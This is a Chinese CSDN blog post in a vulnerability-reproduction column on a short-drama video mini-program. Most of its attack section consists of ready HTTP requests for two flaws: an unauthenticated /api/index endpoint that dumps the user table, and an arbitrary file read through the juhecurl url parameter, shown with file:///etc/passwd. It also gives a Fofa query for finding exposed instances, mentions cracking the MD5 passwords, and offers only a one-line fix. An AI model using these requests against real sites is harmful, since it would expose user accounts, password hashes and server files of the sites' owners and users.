短剧影视小程序前台未授权访问与任意文件读取

于 2024-09-02 18:02:41 发布
阅读量255 收藏
点赞数 5
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141825981
版权

0x01 漏洞描述:

未授权:

在Index.php方法中查询了网站中User表里的所有字段,并将用户枚举出来,因为$noNeedLogin = ['*']导致可未授权访问

任意文件读取:

在/Ems.php 控制器中的 juhecurl 方法存在curl_exec函数,且参数url为用户可控,导致漏洞产生

0x02 搜索语句:

Fofa:"/VwmRIfEYDH.php"

0x03 漏洞复现:

未授权访问:

POST /api/index HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

 

md5碰撞得明文密码

 

 任意文件读取:

GET /api/ems/juhecurl?url=file:///etc/passwd HTTP/1.1
Host: your-ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 

0x04 修复建议:

 控制用户传参限制,接口加上权限校验。

iSee857
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
仿抖音滑动小短剧影视微信小程序源码带支付收益等模式
weixin_49082016的博客
04-03 767
项目功能介绍:支持无限滑动 高性能滑动 预加载 视频预览。丰富的后台设置,具体大家可以看小编的后台演示图。具体小编也不多说了,大家可以自行下载搭建研究。前端支持抖音,快手,百度,H5和微信小程序。通过百度网盘分享的文件:短视频小程序.z…支持剧情介绍,集合壁纸另外仿抖音滑动效果。支持会员模式,支持用户单独购买等等多功能。需要哪个端就发行到哪个端即可。
【新版】小剧场短剧影视小程序源码
软希网分享源码的博客
04-21 299
【新版】小剧场短剧影视小程序源码
仿抖音短剧影视小程序
起风啦
04-12 660
仿抖音滑动小短剧影视微信小程序、支持无限滑动;高性能滑动、预加载、视频预览......支持剧情介绍,集合壁纸另外仿抖音滑动效果;支持会员模式,支持用户单独购买等等多功能。☑️ 品牌:小程序/H5 (uniapp开发)搜索支付宝小程序:周先森软件(免费获取源码)前端支持多端小程序,uniapp开发。
仿抖音滑动小短剧影视微信小程序源码
爱技术、爱生活、爱健康
05-17 577
仿抖音滑动小短剧影视微信小程序源码,带支付收益等模式、支持无限滑动;高性能滑动、预加载、视频预览,支持剧情介绍,集合壁纸另外仿抖音滑动效果;支持会员模式,支持用户单独购买等等多功能.丰富的后台设置,具体大家可以看小编的后台演示图,大家可以自行下载搭建研究.前端支持抖音、快手、百度、H5和微信小程序,需要哪个。端就发行到哪个端即可.
小剧场短剧影视小程序源码 全开源 带支付收益等模式 付费短剧小程序源码
软希网分享源码的博客
04-02 946
小剧场短剧影视小程序源码 全开源 带支付收益等模式 付费短剧小程序源码
2024最新付费短剧追剧影视小程序源码,带支付收益(带教程数据库前后端)
软希网分享源码的博客
01-10 1149
2024最新付费短剧追剧影视小程序源码,带支付收益(带教程数据库前后端)
微信短剧影视系统:短剧小程序源码与追剧源码的融合创新
ioioio1s23的博客
08-11 397
它通过短剧小程序源码、追剧源码以及支持H5技术的融合,为用户带来了全新的观看体验,也为内容创作者提供了展示自己作品的舞台。短剧小程序源码为开发者提供了一个快速搭建短剧播放平台的框架,使得内容创作者能够迅速将自己的作品推向市场,同时也为用户提供了便捷的观看渠道。随着移动互联网的普及和用户对碎片化内容需求的增加,短剧作为一种新兴的内容形式,正逐渐受到市场的青睐。它通过短剧小程序源码、追剧源码以及H5技术的结合,为用户提供了一个全新的观看体验,同时也为内容创作者提供了一个展示自己才华的平台。
PHP源码|小剧场短剧影视小程序
吉他程序员的博客
04-30 529
【代码】小剧场短剧影视小程序源码_后端PHP。
短剧源码|小剧场短剧影视小程序源码全开源
kangfanzi的博客
05-21 822
寻找一家值得信赖的短剧源码开发公司,在创建此类短剧源码方面拥有成熟的专业知识。这将帮助您了解不同的方面,例如短剧源码的最佳平台、短剧源码将解决的目的、短剧源码被使用的可能性等。例如,在电子学习短剧源码中,可以根据用户的浏览历史记录向用户提示视频或课程的智能推荐。首先要决定的是电视短剧源码开发的平台。智能电视在消费者中已成为一种日益流行的趋势,预计在不久的将来,智能电视的采用率也会上升。在与任何短剧源码开发机构合作之前,请务必仔细检查他们的产品组合,评估他们的技术技能并确定他们的经验水平。
2024小剧场短剧影视小程序源码
01-03
2023短剧系统|追剧影视小程序|付费短视频小剧场|带支付收益等。前端支持打包 抖音小程序,快手小程序,百度小程序,H5和微信小程序 支持H5,APP多端支持,需要哪个端就发行到哪个端即可 前端文件需要用到HBuilder X...
2024最新版视频短剧SAAS系统源码 影视短剧小程序源码(含详细搭建教程)亲测
06-10
2024最新版视频短剧SAAS系统源码 影视短剧小程序源码 附完整搭建教程 1.依旧采用saas版本 2.目前支持微信小程序和公众号h5 3.分销商等级自定义价格配置 4.二级分销功能 5.vip会员功能 6.强大的卡密兑换(vip...
小剧场短剧影视小程序源码
05-28
小剧场短剧影视小程序源码是一款专为短剧影视领域设计的应用程序源代码,它集成了微信小程序和H5多端支持,旨在提供一个全面的平台,让用户在移动端轻松观看和分享各种短剧内容。这款源码的独特之处在于它是全网首家...
免费2023年小剧场短剧影视小程序源码 全开源 带支付收益等模式 付费短剧小程序源码
08-22
2023年短剧小程序简介: .一、内容展示(短剧视频免费使用,主流呈现形式付费,VIP模式,任务等)。要解锁免费配对,热门短剧影视作品,并随时观看。)。 二、无需担心营销推广(裂变营销功能、自主促销激励、...
Web安全之XSS跨站脚本攻击
good good study day day up
08-29 1892
XSS漏洞简介、原理、攻击方式、危害、常用标签、绕过技巧、防御
【补-网络安全】日常运维(二)终端端口占用排查
最新发布
Ryoujou的博客
09-02 137
端口占用及开放情况
网络安全售前入门10安全服务——安全培训服务
打工人
09-02 718
对企业人员进行安全意识培训,提高企业人员的安全意识。应对信息安全风险能力、信息系统安全运维水平,降低信息系统安全风险的重要工作,是《网络安全法》的合规性要求。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1304
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值